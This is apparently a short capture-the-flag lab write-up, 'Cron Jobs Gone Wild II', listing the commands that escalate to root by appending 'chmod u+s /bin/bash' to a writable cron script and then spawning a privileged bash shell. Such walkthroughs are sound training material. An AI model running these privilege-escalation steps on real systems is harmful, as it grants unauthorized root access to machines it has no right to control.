Cron Jobs Gone Wild II

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. A terminal access to the target machine is provided at target.ine.local:8000, which you can access over the browser in Kali.

Objective: Your mission is to get a root shell on the box and retrieve the flag!

Tools

The best tools for this lab are:

Nmap
Browser(Firefox)

Writeup

sudo -l

grep -nri "/tmp/message" /usr
cat /usr/local/share/copy.sh
sudo /etc/init.d/cron stop
echo "chmod u+s /bin/bash" >> /usr/local/share/copy.sh
sudo /etc/init.d/cron start
/bin/bash -p

PreviousSamba Recon: Dictionary Attack NextExploiting Setuid Programs

Last updated 5 months ago